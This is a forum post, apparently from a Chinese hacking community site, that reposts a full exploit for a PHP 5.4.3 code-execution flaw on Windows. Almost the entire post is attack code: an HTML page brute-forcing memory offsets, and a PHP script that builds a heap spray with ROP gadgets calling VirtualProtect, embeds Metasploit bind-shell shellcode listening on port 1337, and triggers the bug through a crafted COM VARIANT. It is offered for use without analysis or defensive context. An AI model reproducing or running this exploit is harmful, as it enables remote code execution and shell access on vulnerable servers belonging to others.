电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

PHP 5.4 (5.4.3) Code Execution (Win32)

[复制链接]
bek 发表于 2012-5-18 14:24:46 | 显示全部楼层 |阅读模式

  1. // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
  2. // Exploit author: 0in (Maksymilian Motyl)
  3. // Email: 0in(dot)email(at)gmail.com
  4. // * Bug with Variant type parsing originally discovered by Condis
  5. // Tested on Windows XP SP3 fully patched (Polish)
  6. ===================
  7. offset-brute.html
  8. ===================
  9. <html><body>
  10. <title>0day</title>
  11. <center>
  12. <font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
  13. <textarea rows=50 cols=50 id="log">&lt;/textarea&gt;
  14. </center>
  15. <script>
  16. function sleep(milliseconds) {
  17. var start = new Date().getTime();
  18. for (var i = 0; i < 1e7; i++) {
  19. if ((new Date().getTime() - start) > milliseconds){
  20. break;
  21. }
  22. }
  23. }
  24. function makeRequest(url, parameters)
  25. {
  26. var xmlhttp = new XMLHttpRequest();
  27. if (window.XMLHttpRequest) {
  28. xmlhttp = new XMLHttpRequest();
  29. if (xmlhttp.overrideMimeType) {
  30. xmlhttp.overrideMimeType('text/xml');
  31. }
  32. } else if (window.ActiveXObject) {
  33. // IE
  34. try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  35. catch (e) {
  36. try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  37. catch (e) {}
  38. }
  39. }
  40. if (!xmlhttp) {
  41. alert('Giving up Cannot create an XMLHTTP instance');
  42. return false;
  43. }
  44. xmlhttp.open("GET",url,true);
  45. xmlhttp.send(null);
  46. return true;
  47. }
  48. test=document.getElementById("log");
  49. for(offset=0;offset<300;offset++)
  50. {
  51. log.value+="Trying offset:"+offset+"\r\n";
  52. makeRequest("0day.php?offset="+offset);
  53. sleep(500);
  54. }
  55. </script></body></html>
  56. ===================
  57. 0day.php
  58. ===================
  59. <?php
  60. $spray = str_repeat("\x90",0x200);
  61. $offset=$_GET['offset'];
  62. // 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll]
  63. $spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1);
  64. // :> 0x048d0030
  65. $spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1);
  66. //0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]
  67. $spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1);
  68. // Adress of VirtualProtect 0x7c801ad4
  69. $spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);
  70. // LPVOID lpAddress = 0x048d0060 www.2cto.com
  71. $spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);
  72. // SIZE_T dwSize = 0x01000000
  73. $spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);
  74. // DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0
  75. $spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
  76. // __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000
  77. // 0x048d0068
  78. $spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);
  79. //0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]
  80. $spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4);
  81. // Ret Address = 0x048d0080
  82. $spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4);
  83. $stacktrack = "\xbc\x0c\xb0\xc0\x00";
  84. // Universal win32 bindshell on port 1337 from metasploit
  85. $shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0".
  86. "\x81\xc4\xd0\xfd\xff\xff".
  87. "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
  88. "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
  89. "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
  90. "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
  91. "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
  92. "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
  93. "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
  94. "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
  95. "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
  96. "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
  97. "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
  98. "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
  99. "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
  100. "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
  101. "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
  102. "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
  103. "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
  104. "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
  105. "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
  106. "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
  107. "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
  108. "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";
  109. $spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode)));
  110. $fullspray="";
  111. for($i=0;$i<0x4b00;$i++)
  112. {
  113. $fullspray.=$spray;
  114. }
  115. $j=array();
  116. $e=array();
  117. $b=array();
  118. $a=array();
  119. $c=array();
  120. array_push($j,$fullspray);
  121. array_push($e,$fullspray."W");
  122. array_push($b,$fullspray."A");
  123. array_push($a,$fullspray."S");
  124. array_push($c,$fullspray."!");
  125. $vVar = new VARIANT(0x048d0038+$offset);
  126. // Shoot him
  127. com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]
  128. echo $arr;
  129. echo $spray;
  130. ?>
复制代码
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-1-23 06:09

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表